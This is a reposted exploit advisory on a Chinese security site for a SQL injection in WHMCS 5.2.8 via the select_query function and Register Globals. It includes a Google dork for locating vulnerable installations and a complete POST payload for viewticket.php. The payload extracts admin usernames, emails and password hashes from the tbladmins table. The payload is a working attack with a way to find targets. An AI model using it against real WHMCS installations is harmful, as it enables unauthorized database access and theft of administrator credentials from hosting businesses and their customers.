WHMCS 5.2.8 - SQL Injection Vulnerability

2019年12月31日21:19:36评论1,079 views字数 496阅读1分39秒阅读模式

摘要

# Google Dork: "powered by WHMCS"
# Exploit Author: g00n ( Xploiter.net )
# Vendor Homepage: http://www.whmcs.com/
# Software Link: http://www.whmcs.com/
# Version: 5.2.8
# Tested on: Windows, Linux

Vulnerable file: /includes/dbfunctions.php

POC:

select_query() function is vulnerable due to Register Globals

Example:

/whmcs/viewticket.php
[php]
POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#
[/php]

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由没穿底裤发表于 2019年12月31日21:19:36
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
WHMCS 5.2.8 - SQL Injection Vulnerabilityhttps://cn-sec.com/archives/75404.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

WHMCS 5.2.8 - SQL Injection Vulnerability

微擎普通用户权限SQL注入漏洞

无需登录-悟空CRM 存储型XSS

cacti 0.8.8g cdef.php selected_items 存在sql注入

ZwelL通用图片上传漏洞

discuz某插件设计缺陷可前台getshell

Seacmsv6.25 two sql inject

深信服数据中心2.0某处存在命令执行漏洞

Z-blog前台无需登录包含漏洞一枚

发表评论

在线咨询

微信